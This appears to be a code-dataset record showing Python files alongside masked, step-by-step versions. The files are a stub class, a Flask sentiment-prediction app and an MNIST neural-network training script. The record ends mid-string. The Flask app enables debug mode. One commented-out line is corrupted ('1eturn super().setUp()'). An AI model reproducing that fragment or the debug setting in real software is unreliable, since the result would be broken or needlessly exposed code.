code
stringlengths
13
1.2M
order_type
stringclasses
1 value
original_example
dict
step_ids
listlengths
1
5
from room import Room class Office(Room): def __init__(self): pass
normal
{ "blob_id": "d3af5ac87474a99f1ade222995884bc8e035ce35", "index": 6142, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Office(Room):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Office(Room):\n\n def __init__(self):\n pass\n", "step-4": "from room import Room\n\n\nclass Office(Room):\n\n def __init__(self):\n pass\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from flask import Flask, render_template , request import joblib # importing all the important libraires import numpy as np import pandas as pd import nltk import string from nltk.corpus import stopwords from sklearn.model_selection import train_test_split from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer # download the model nltk.download('wordnet') from nltk.stem import WordNetLemmatizer lemma = WordNetLemmatizer() # initialse the app app = Flask(__name__) #load the model tfidf = joblib.load('tfidf_vector_model.pkl') model = joblib.load('netflix_75.pkl') @app.route('/') def hello(): return render_template('form.html') @app.route('/submit' , methods = ["POST"]) def form_data(): user_data = request.form.get('user_data') user_data1 = [user_data] vector = tfidf.transform(user_data1) my_pred = model.predict(vector) if my_pred[0] == 1: out = 'positve review' else: out = 'negative review' return render_template('predict.html' , data = f' {out}') if __name__ == '__main__': app.run(debug = True)
normal
{ "blob_id": "df92166378c8a8cc0ba02d0ba33d75bbd94510a7", "index": 4754, "step-1": "<mask token>\n\n\[email protected]('/')\ndef hello():\n return render_template('form.html')\n\n\[email protected]('/submit', methods=['POST'])\ndef form_data():\n user_data = request.form.get('user_data')\n user_data1 = [user_data]\n vector = tfidf.transform(user_data1)\n my_pred = model.predict(vector)\n if my_pred[0] == 1:\n out = 'positve review'\n else:\n out = 'negative review'\n return render_template('predict.html', data=f' {out}')\n\n\n<mask token>\n", "step-2": "<mask token>\nnltk.download('wordnet')\n<mask token>\n\n\[email protected]('/')\ndef hello():\n return render_template('form.html')\n\n\[email protected]('/submit', methods=['POST'])\ndef form_data():\n user_data = request.form.get('user_data')\n user_data1 = [user_data]\n vector = tfidf.transform(user_data1)\n my_pred = model.predict(vector)\n if my_pred[0] == 1:\n out = 'positve review'\n else:\n out = 'negative review'\n return render_template('predict.html', data=f' {out}')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-3": "<mask token>\nnltk.download('wordnet')\n<mask token>\nlemma = WordNetLemmatizer()\napp = Flask(__name__)\ntfidf = joblib.load('tfidf_vector_model.pkl')\nmodel = joblib.load('netflix_75.pkl')\n\n\[email protected]('/')\ndef hello():\n return render_template('form.html')\n\n\[email protected]('/submit', methods=['POST'])\ndef form_data():\n user_data = request.form.get('user_data')\n user_data1 = [user_data]\n vector = tfidf.transform(user_data1)\n my_pred = model.predict(vector)\n if my_pred[0] == 1:\n out = 'positve review'\n else:\n out = 'negative review'\n return render_template('predict.html', data=f' {out}')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-4": "from flask import Flask, render_template, request\nimport joblib\nimport numpy as np\nimport pandas as pd\nimport nltk\nimport string\nfrom nltk.corpus import stopwords\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nnltk.download('wordnet')\nfrom nltk.stem import WordNetLemmatizer\nlemma = WordNetLemmatizer()\napp = Flask(__name__)\ntfidf = joblib.load('tfidf_vector_model.pkl')\nmodel = joblib.load('netflix_75.pkl')\n\n\[email protected]('/')\ndef hello():\n return render_template('form.html')\n\n\[email protected]('/submit', methods=['POST'])\ndef form_data():\n user_data = request.form.get('user_data')\n user_data1 = [user_data]\n vector = tfidf.transform(user_data1)\n my_pred = model.predict(vector)\n if my_pred[0] == 1:\n out = 'positve review'\n else:\n out = 'negative review'\n return render_template('predict.html', data=f' {out}')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-5": "from flask import Flask, render_template , request\r\nimport joblib\r\n\r\n\r\n# importing all the important libraires\r\nimport numpy as np\r\nimport pandas as pd\r\nimport nltk\r\nimport string\r\nfrom nltk.corpus import stopwords\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\r\n# download the model\r\nnltk.download('wordnet')\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\nlemma = WordNetLemmatizer()\r\n\r\n# initialse the app\r\napp = Flask(__name__)\r\n\r\n#load the model\r\ntfidf = joblib.load('tfidf_vector_model.pkl')\r\nmodel = joblib.load('netflix_75.pkl')\r\n\r\[email protected]('/')\r\ndef hello():\r\n return render_template('form.html')\r\n\r\[email protected]('/submit' , methods = [\"POST\"])\r\ndef form_data():\r\n user_data = request.form.get('user_data')\r\n user_data1 = [user_data]\r\n vector = tfidf.transform(user_data1)\r\n my_pred = model.predict(vector)\r\n\r\n if my_pred[0] == 1:\r\n out = 'positve review'\r\n else:\r\n out = 'negative review'\r\n \r\n \r\n\r\n \r\n\r\n return render_template('predict.html' , data = f' {out}')\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)\r\n\r\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
from HiddenLayer import HiddenLayer from Vector import Vector import IO import Loss import Utils import Activation import Backpropagation import Rate # As a test, let's simulate the OR-gate with a single perceptron """ training = [] training.append(Vector(2, arr=[1, 1])) training.append(Vector(2, arr=[1, 0])) training.append(Vector(2, arr=[0, 1])) training.append(Vector(2, arr=[0, 0])) labels = Vector(4, arr=[1, 1, 1, 0]) from Vector left_true= Vector(2, arr=[1, 0]) both_false = Vector(2, arr=[0, 0]) print(tron.predict(both_true)) print(tron.predict(right_true)) print(tron.predict(left_true)) print(tron.predict(both_false)) """ # Testing the reading of data """ images = Data.read_images('test') labels = Data.read_labels('test') UI.draw_image(images[1234], "testi") print(labels[1234]) """ # Vector multiplication test """ print(Vector(4, arr=[1, 2, 3, 4]) * Vector(4, arr=[1, 2, 2, 2])) """ # Neuron output test """ n = Neuron(Utils.rand_array(4), Activation.sigmoid, Activation.sigmoid_d, 3) x = Vector(4, arr=Utils.rand_array(4)) print(n) print(x) print(n.output(x)) """ # rand_array and normalization test """ arr = Utils.rand_array(10, -5, 15) print(arr) print(Utils.normalize(arr, -5, 15)) """ # Testing some hidden layer basic functionality and saving/loading """ images = IO.read_images('test') labels = IO.read_labels('test') weights = [Utils.rand_array(784, -1, 1) for _ in range(10)] hl_a = HiddenLayer(10, 784, weights, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1) #IO.save_layer(hl_a, "test") hl_b = IO.load_layer("test") for i in range(9): img = Vector(Utils.normalize(Utils.flatten_2d(images[i]), 0, 255)) o1 = hl_a.generate_output(img) o2 = hl_b.generate_output(img) #print("Picture " + str(i + 1) + ": " + str(o1) + ", " + str(o2) + ", correct answer is " + str(labels[i])) print(o1) print(o2) """ # Array flattening testing """ testarr = [[1, 2, 7, 8], [3, 4, 9, 10], [5, 6, 11, 12]] testarr = Utils.flatten_2d(testarr) print(testarr) testarr = Utils.deflatten_2d(testarr, 4, 3) print(testarr) """ # Let's test multi-layer nets """ images = IO.read_images('test') labels = IO.read_labels('test') img_test = images[:20] lab_test = labels[:20] weights_a = [Utils.rand_array(784, 0, 1) for _ in range(10)] weights_b = [Utils.rand_array(10, 0, 1) for _ in range(10)] hl_a = HiddenLayer(10, 784, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1) hl_b = HiddenLayer(10, 10, weights_b, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1) LEARNING_RATE = 0.5 for (i, l) in zip(images, labels): img = Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255)) lab = Utils.onehot_label_arr(l) o_a = hl_a.generate_output(img) o_b = hl_b.generate_output(o_a) grads = Backpropagation.output_layer_grads(hl_b, o_b, lab, hl_a, LEARNING_RATE) #grad_b = #print("Picture " + str(i + 1) + ": " + str(o1) + ", " + str(o2) + ", correct answer is " + str(labels[i])) #print(o_a) #print(o_b) #print(lab) #print() #print("----") for n in hl_b.neurons: print(n.weights) """ # Let's try how well a single one-layer 10-neuron net performs! # Read images and labels """ images = IO.read_images('training') labels = IO.read_labels('training') test_images = IO.read_images('test') test_labels = IO.read_labels('test') print("Images & labels read!") # Preprocess images and labels images_flat = [] labels_oh = [] test_images_flat = [] for (i, l) in zip(images, labels): images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255))) labels_oh.append(Utils.onehot_label_arr(l)) for i in test_images: test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255))) print("Images & labels processed!") # Initialize weights and layer #weights_a = [Utils.rand_array(784, 0, 1) for _ in range(10)] weights_a = [[0] * 784] * 10 hl_a = HiddenLayer(10, 784, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1) LEARNING_RATE = 0.05 iter = 1eturn super().setUp() prev_correct = 0 #old_weights = weights_a while True: print("Iteration: " + str(iter)) j = 1 for (img, lab) in zip(images_flat, labels_oh): o_a = hl_a.generate_output(img) grads = Backpropagation.output_layer_backpropagate(hl_a, o_a, lab, img, LEARNING_RATE) if j % 1000 == 0: print(" " + str(j)) j += 1 right_amount = 0 for (img, lab) in zip(test_images_flat, test_labels): o_a = hl_a.generate_output(img) pred = Utils.make_prediction(o_a) if pred == lab: right_amount += 1 print("Correct predictions: " + str(right_amount)) if (iter > 10): break prev_correct = right_amount iter = iter + 1 """ #IO.save_layer(hl_a, "test1_3") # Visualize weights! """ hl_a = IO.load_layer("test1_3") i = 0 for n in hl_a.neurons: weights = n.weights weights = Utils.fit_arr(weights, 0, 255) #print(weights) IO.save_image(Utils.deflatten_2d(weights, 28, 28), "w" + str(i)) i += 1 """ # Final boss: a 32-16-10 multi-layer net! images = IO.read_images('training') labels = IO.read_labels('training') test_images = IO.read_images('test') test_labels = IO.read_labels('test') print("Images & labels read!") # Preprocess images and labels images_flat = [] labels_oh = [] test_images_flat = [] for (i, l) in zip(images, labels): images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1))) labels_oh.append(Utils.onehot_label_arr(l)) for i in test_images: test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1))) print("Images & labels processed!") # Don't change these two IMAGE_INPUT_SIZE = 784 OUTPUT_LAYER_SIZE = 10 # These define how many neurons in layers A & B LAYER_A_SIZE = 32 LAYER_B_SIZE = 16 # Initialize weights and layer weights_a = [Utils.rand_array(IMAGE_INPUT_SIZE, -1, 1) for _ in range(LAYER_A_SIZE)] weights_b = [Utils.rand_array(LAYER_A_SIZE, -1, 1) for _ in range(LAYER_B_SIZE)] weights_op = [Utils.rand_array(LAYER_B_SIZE, -1, 1) for _ in range(OUTPUT_LAYER_SIZE)] hl_a = HiddenLayer(LAYER_A_SIZE, IMAGE_INPUT_SIZE, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.mean_quadratic_d, 0) hl_b = HiddenLayer(LAYER_B_SIZE, LAYER_A_SIZE, weights_b, Activation.sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.mean_quadratic_d, 0) opl = HiddenLayer(OUTPUT_LAYER_SIZE, LAYER_B_SIZE, weights_op, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0) # ---- Change these if you want to play around with the program ---- # These decide when the training stops ITERATION_CAP = 20 # after 20 iterations or ACCURACY_CAP = 6500 # at 65% accuracy # These adjust the learning process INITIAL_LEARNING_RATE = 0.05 LEARNING_DECAY_SCALAR = 0.0025 BATCH_SIZE = 100 # ---------------- learning_rate = INITIAL_LEARNING_RATE iter = 1 prev_correct = 0 while True: print("Iteration: " + str(iter)) learning_rate = Rate.decaying(learning_rate, iter, LEARNING_DECAY_SCALAR) print("Learning rate: " + str(learning_rate)) j = 1 batchtracker = 0 img_sum = Vector([0] * IMAGE_INPUT_SIZE) lab_sum = Vector([0] * OUTPUT_LAYER_SIZE) oa_sum = Vector([0] * LAYER_A_SIZE) ob_sum = Vector([0] * LAYER_B_SIZE) op_sum = Vector([0] * OUTPUT_LAYER_SIZE) for (img, lab) in zip(images_flat, labels_oh): o_a = hl_a.generate_output(img) o_b = hl_b.generate_output(o_a['op']) output = opl.generate_output(o_b['op']) img_sum = img_sum + img lab_sum = lab_sum + Vector(lab) oa_sum = oa_sum + o_a['op'] ob_sum = ob_sum + o_b['op'] op_sum = op_sum + output['op'] batchtracker = batchtracker + 1 if batchtracker == BATCH_SIZE: img_sum = img_sum * (1 / BATCH_SIZE) lab_sum = lab_sum * (1 / BATCH_SIZE) oa_sum = oa_sum * (1 / BATCH_SIZE) ob_sum = ob_sum * (1 / BATCH_SIZE) op_sum = op_sum * (1 / BATCH_SIZE) #print(opl.loss(lab_sum, op_sum)) opl_backprop = Backpropagation.output_layer_backpropagate(opl, op_sum, lab, ob_sum, learning_rate) hl_b_backprop = Backpropagation.hidden_layer_backpropagate(hl_b, oa_sum, ob_sum, opl_backprop, learning_rate) hl_a_backprop = Backpropagation.hidden_layer_backpropagate(hl_a, img, oa_sum, hl_b_backprop, learning_rate) img_sum = Vector([0] * IMAGE_INPUT_SIZE) lab_sum = Vector([0] * OUTPUT_LAYER_SIZE) oa_sum = Vector([0] * LAYER_A_SIZE) ob_sum = Vector([0] * LAYER_B_SIZE) op_sum = Vector([0] * OUTPUT_LAYER_SIZE) batchtracker = 0 if j % 10000 == 0: print(" " + str(j)) j += 1 print("Iteration " + str(iter) + " done! Now testing accuracy...") right_amount = 0 for (img_t, lab_t) in zip(test_images_flat, test_labels): oa = hl_a.generate_output(img_t)['op'] ob = hl_b.generate_output(oa)['op'] op = opl.generate_output(ob)['op'] pred = Utils.make_prediction(op) if pred == lab_t: right_amount += 1 print("Correct predictions: " + str(right_amount)) if (iter >= ITERATION_CAP): break if (prev_correct >= ACCURACY_CAP): break #if (prev_correct > right_amount): # break prev_correct = right_amount iter = iter + 1 IO.save_layer(hl_a, "test_layer_a") IO.save_layer(hl_b, "test_layer_b") IO.save_layer(opl, "test_layer_c")
normal
{ "blob_id": "1f86fe72c90c8457715a2f400dae8d355a9a97cf", "index": 8577, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint('Images & labels read!')\n<mask token>\nfor i, l in zip(images, labels):\n images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\n labels_oh.append(Utils.onehot_label_arr(l))\nfor i in test_images:\n test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\nprint('Images & labels processed!')\n<mask token>\nwhile True:\n print('Iteration: ' + str(iter))\n learning_rate = Rate.decaying(learning_rate, iter, LEARNING_DECAY_SCALAR)\n print('Learning rate: ' + str(learning_rate))\n j = 1\n batchtracker = 0\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n for img, lab in zip(images_flat, labels_oh):\n o_a = hl_a.generate_output(img)\n o_b = hl_b.generate_output(o_a['op'])\n output = opl.generate_output(o_b['op'])\n img_sum = img_sum + img\n lab_sum = lab_sum + Vector(lab)\n oa_sum = oa_sum + o_a['op']\n ob_sum = ob_sum + o_b['op']\n op_sum = op_sum + output['op']\n batchtracker = batchtracker + 1\n if batchtracker == BATCH_SIZE:\n img_sum = img_sum * (1 / BATCH_SIZE)\n lab_sum = lab_sum * (1 / BATCH_SIZE)\n oa_sum = oa_sum * (1 / BATCH_SIZE)\n ob_sum = ob_sum * (1 / BATCH_SIZE)\n op_sum = op_sum * (1 / BATCH_SIZE)\n opl_backprop = Backpropagation.output_layer_backpropagate(opl,\n op_sum, lab, ob_sum, learning_rate)\n hl_b_backprop = Backpropagation.hidden_layer_backpropagate(hl_b,\n oa_sum, ob_sum, opl_backprop, learning_rate)\n hl_a_backprop = Backpropagation.hidden_layer_backpropagate(hl_a,\n img, oa_sum, hl_b_backprop, learning_rate)\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n batchtracker = 0\n if j % 10000 == 0:\n print(' ' + str(j))\n j += 1\n print('Iteration ' + str(iter) + ' done! Now testing accuracy...')\n right_amount = 0\n for img_t, lab_t in zip(test_images_flat, test_labels):\n oa = hl_a.generate_output(img_t)['op']\n ob = hl_b.generate_output(oa)['op']\n op = opl.generate_output(ob)['op']\n pred = Utils.make_prediction(op)\n if pred == lab_t:\n right_amount += 1\n print('Correct predictions: ' + str(right_amount))\n if iter >= ITERATION_CAP:\n break\n if prev_correct >= ACCURACY_CAP:\n break\n prev_correct = right_amount\n iter = iter + 1\nIO.save_layer(hl_a, 'test_layer_a')\nIO.save_layer(hl_b, 'test_layer_b')\nIO.save_layer(opl, 'test_layer_c')\n", "step-3": "<mask token>\nimages = IO.read_images('training')\nlabels = IO.read_labels('training')\ntest_images = IO.read_images('test')\ntest_labels = IO.read_labels('test')\nprint('Images & labels read!')\nimages_flat = []\nlabels_oh = []\ntest_images_flat = []\nfor i, l in zip(images, labels):\n images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\n labels_oh.append(Utils.onehot_label_arr(l))\nfor i in test_images:\n test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\nprint('Images & labels processed!')\nIMAGE_INPUT_SIZE = 784\nOUTPUT_LAYER_SIZE = 10\nLAYER_A_SIZE = 32\nLAYER_B_SIZE = 16\nweights_a = [Utils.rand_array(IMAGE_INPUT_SIZE, -1, 1) for _ in range(\n LAYER_A_SIZE)]\nweights_b = [Utils.rand_array(LAYER_A_SIZE, -1, 1) for _ in range(LAYER_B_SIZE)\n ]\nweights_op = [Utils.rand_array(LAYER_B_SIZE, -1, 1) for _ in range(\n OUTPUT_LAYER_SIZE)]\nhl_a = HiddenLayer(LAYER_A_SIZE, IMAGE_INPUT_SIZE, weights_a, Activation.\n sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.\n mean_quadratic_d, 0)\nhl_b = HiddenLayer(LAYER_B_SIZE, LAYER_A_SIZE, weights_b, Activation.\n sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.\n mean_quadratic_d, 0)\nopl = HiddenLayer(OUTPUT_LAYER_SIZE, LAYER_B_SIZE, weights_op, Activation.\n sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0)\nITERATION_CAP = 20\nACCURACY_CAP = 6500\nINITIAL_LEARNING_RATE = 0.05\nLEARNING_DECAY_SCALAR = 0.0025\nBATCH_SIZE = 100\nlearning_rate = INITIAL_LEARNING_RATE\niter = 1\nprev_correct = 0\nwhile True:\n print('Iteration: ' + str(iter))\n learning_rate = Rate.decaying(learning_rate, iter, LEARNING_DECAY_SCALAR)\n print('Learning rate: ' + str(learning_rate))\n j = 1\n batchtracker = 0\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n for img, lab in zip(images_flat, labels_oh):\n o_a = hl_a.generate_output(img)\n o_b = hl_b.generate_output(o_a['op'])\n output = opl.generate_output(o_b['op'])\n img_sum = img_sum + img\n lab_sum = lab_sum + Vector(lab)\n oa_sum = oa_sum + o_a['op']\n ob_sum = ob_sum + o_b['op']\n op_sum = op_sum + output['op']\n batchtracker = batchtracker + 1\n if batchtracker == BATCH_SIZE:\n img_sum = img_sum * (1 / BATCH_SIZE)\n lab_sum = lab_sum * (1 / BATCH_SIZE)\n oa_sum = oa_sum * (1 / BATCH_SIZE)\n ob_sum = ob_sum * (1 / BATCH_SIZE)\n op_sum = op_sum * (1 / BATCH_SIZE)\n opl_backprop = Backpropagation.output_layer_backpropagate(opl,\n op_sum, lab, ob_sum, learning_rate)\n hl_b_backprop = Backpropagation.hidden_layer_backpropagate(hl_b,\n oa_sum, ob_sum, opl_backprop, learning_rate)\n hl_a_backprop = Backpropagation.hidden_layer_backpropagate(hl_a,\n img, oa_sum, hl_b_backprop, learning_rate)\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n batchtracker = 0\n if j % 10000 == 0:\n print(' ' + str(j))\n j += 1\n print('Iteration ' + str(iter) + ' done! Now testing accuracy...')\n right_amount = 0\n for img_t, lab_t in zip(test_images_flat, test_labels):\n oa = hl_a.generate_output(img_t)['op']\n ob = hl_b.generate_output(oa)['op']\n op = opl.generate_output(ob)['op']\n pred = Utils.make_prediction(op)\n if pred == lab_t:\n right_amount += 1\n print('Correct predictions: ' + str(right_amount))\n if iter >= ITERATION_CAP:\n break\n if prev_correct >= ACCURACY_CAP:\n break\n prev_correct = right_amount\n iter = iter + 1\nIO.save_layer(hl_a, 'test_layer_a')\nIO.save_layer(hl_b, 'test_layer_b')\nIO.save_layer(opl, 'test_layer_c')\n", "step-4": "from HiddenLayer import HiddenLayer\nfrom Vector import Vector\nimport IO\nimport Loss\nimport Utils\nimport Activation\nimport Backpropagation\nimport Rate\n<mask token>\nimages = IO.read_images('training')\nlabels = IO.read_labels('training')\ntest_images = IO.read_images('test')\ntest_labels = IO.read_labels('test')\nprint('Images & labels read!')\nimages_flat = []\nlabels_oh = []\ntest_images_flat = []\nfor i, l in zip(images, labels):\n images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\n labels_oh.append(Utils.onehot_label_arr(l))\nfor i in test_images:\n test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\nprint('Images & labels processed!')\nIMAGE_INPUT_SIZE = 784\nOUTPUT_LAYER_SIZE = 10\nLAYER_A_SIZE = 32\nLAYER_B_SIZE = 16\nweights_a = [Utils.rand_array(IMAGE_INPUT_SIZE, -1, 1) for _ in range(\n LAYER_A_SIZE)]\nweights_b = [Utils.rand_array(LAYER_A_SIZE, -1, 1) for _ in range(LAYER_B_SIZE)\n ]\nweights_op = [Utils.rand_array(LAYER_B_SIZE, -1, 1) for _ in range(\n OUTPUT_LAYER_SIZE)]\nhl_a = HiddenLayer(LAYER_A_SIZE, IMAGE_INPUT_SIZE, weights_a, Activation.\n sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.\n mean_quadratic_d, 0)\nhl_b = HiddenLayer(LAYER_B_SIZE, LAYER_A_SIZE, weights_b, Activation.\n sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.\n mean_quadratic_d, 0)\nopl = HiddenLayer(OUTPUT_LAYER_SIZE, LAYER_B_SIZE, weights_op, Activation.\n sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0)\nITERATION_CAP = 20\nACCURACY_CAP = 6500\nINITIAL_LEARNING_RATE = 0.05\nLEARNING_DECAY_SCALAR = 0.0025\nBATCH_SIZE = 100\nlearning_rate = INITIAL_LEARNING_RATE\niter = 1\nprev_correct = 0\nwhile True:\n print('Iteration: ' + str(iter))\n learning_rate = Rate.decaying(learning_rate, iter, LEARNING_DECAY_SCALAR)\n print('Learning rate: ' + str(learning_rate))\n j = 1\n batchtracker = 0\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n for img, lab in zip(images_flat, labels_oh):\n o_a = hl_a.generate_output(img)\n o_b = hl_b.generate_output(o_a['op'])\n output = opl.generate_output(o_b['op'])\n img_sum = img_sum + img\n lab_sum = lab_sum + Vector(lab)\n oa_sum = oa_sum + o_a['op']\n ob_sum = ob_sum + o_b['op']\n op_sum = op_sum + output['op']\n batchtracker = batchtracker + 1\n if batchtracker == BATCH_SIZE:\n img_sum = img_sum * (1 / BATCH_SIZE)\n lab_sum = lab_sum * (1 / BATCH_SIZE)\n oa_sum = oa_sum * (1 / BATCH_SIZE)\n ob_sum = ob_sum * (1 / BATCH_SIZE)\n op_sum = op_sum * (1 / BATCH_SIZE)\n opl_backprop = Backpropagation.output_layer_backpropagate(opl,\n op_sum, lab, ob_sum, learning_rate)\n hl_b_backprop = Backpropagation.hidden_layer_backpropagate(hl_b,\n oa_sum, ob_sum, opl_backprop, learning_rate)\n hl_a_backprop = Backpropagation.hidden_layer_backpropagate(hl_a,\n img, oa_sum, hl_b_backprop, learning_rate)\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n batchtracker = 0\n if j % 10000 == 0:\n print(' ' + str(j))\n j += 1\n print('Iteration ' + str(iter) + ' done! Now testing accuracy...')\n right_amount = 0\n for img_t, lab_t in zip(test_images_flat, test_labels):\n oa = hl_a.generate_output(img_t)['op']\n ob = hl_b.generate_output(oa)['op']\n op = opl.generate_output(ob)['op']\n pred = Utils.make_prediction(op)\n if pred == lab_t:\n right_amount += 1\n print('Correct predictions: ' + str(right_amount))\n if iter >= ITERATION_CAP:\n break\n if prev_correct >= ACCURACY_CAP:\n break\n prev_correct = right_amount\n iter = iter + 1\nIO.save_layer(hl_a, 'test_layer_a')\nIO.save_layer(hl_b, 'test_layer_b')\nIO.save_layer(opl, 'test_layer_c')\n", "step-5": "from HiddenLayer import HiddenLayer\nfrom Vector import Vector\nimport IO\nimport Loss\nimport Utils\nimport Activation\nimport Backpropagation\nimport Rate\n\n\n# As a test, let's simulate the OR-gate with a single perceptron\n\"\"\" training = []\ntraining.append(Vector(2, arr=[1, 1]))\ntraining.append(Vector(2, arr=[1, 0]))\ntraining.append(Vector(2, arr=[0, 1]))\ntraining.append(Vector(2, arr=[0, 0]))\n\nlabels = Vector(4, arr=[1, 1, 1, 0])\nfrom Vector \nleft_true= Vector(2, arr=[1, 0])\nboth_false = Vector(2, arr=[0, 0])\n\nprint(tron.predict(both_true))\nprint(tron.predict(right_true))\nprint(tron.predict(left_true))\nprint(tron.predict(both_false)) \"\"\"\n\n# Testing the reading of data\n\"\"\" images = Data.read_images('test')\nlabels = Data.read_labels('test')\n\nUI.draw_image(images[1234], \"testi\")\nprint(labels[1234]) \"\"\"\n\n# Vector multiplication test\n\"\"\" print(Vector(4, arr=[1, 2, 3, 4]) * Vector(4, arr=[1, 2, 2, 2])) \"\"\"\n\n# Neuron output test\n\"\"\" n = Neuron(Utils.rand_array(4), Activation.sigmoid, Activation.sigmoid_d, 3)\nx = Vector(4, arr=Utils.rand_array(4))\nprint(n)\nprint(x)\nprint(n.output(x)) \"\"\"\n\n# rand_array and normalization test\n\"\"\" arr = Utils.rand_array(10, -5, 15)\nprint(arr)\nprint(Utils.normalize(arr, -5, 15)) \"\"\"\n\n# Testing some hidden layer basic functionality and saving/loading\n\"\"\" images = IO.read_images('test')\nlabels = IO.read_labels('test')\n\nweights = [Utils.rand_array(784, -1, 1) for _ in range(10)]\nhl_a = HiddenLayer(10, 784, weights, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)\n\n#IO.save_layer(hl_a, \"test\")\nhl_b = IO.load_layer(\"test\")\n\nfor i in range(9):\n img = Vector(Utils.normalize(Utils.flatten_2d(images[i]), 0, 255))\n o1 = hl_a.generate_output(img)\n o2 = hl_b.generate_output(img)\n #print(\"Picture \" + str(i + 1) + \": \" + str(o1) + \", \" + str(o2) + \", correct answer is \" + str(labels[i]))\n print(o1)\n print(o2) \"\"\"\n\n# Array flattening testing\n\"\"\" testarr = [[1, 2, 7, 8], [3, 4, 9, 10], [5, 6, 11, 12]]\ntestarr = Utils.flatten_2d(testarr)\nprint(testarr)\ntestarr = Utils.deflatten_2d(testarr, 4, 3)\nprint(testarr) \"\"\"\n\n# Let's test multi-layer nets\n\"\"\" images = IO.read_images('test')\nlabels = IO.read_labels('test')\nimg_test = images[:20]\nlab_test = labels[:20]\n\nweights_a = [Utils.rand_array(784, 0, 1) for _ in range(10)]\nweights_b = [Utils.rand_array(10, 0, 1) for _ in range(10)]\nhl_a = HiddenLayer(10, 784, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)\nhl_b = HiddenLayer(10, 10, weights_b, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)\n\nLEARNING_RATE = 0.5\n\nfor (i, l) in zip(images, labels):\n img = Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255))\n lab = Utils.onehot_label_arr(l)\n o_a = hl_a.generate_output(img)\n o_b = hl_b.generate_output(o_a)\n grads = Backpropagation.output_layer_grads(hl_b, o_b, lab, hl_a, LEARNING_RATE)\n #grad_b = \n #print(\"Picture \" + str(i + 1) + \": \" + str(o1) + \", \" + str(o2) + \", correct answer is \" + 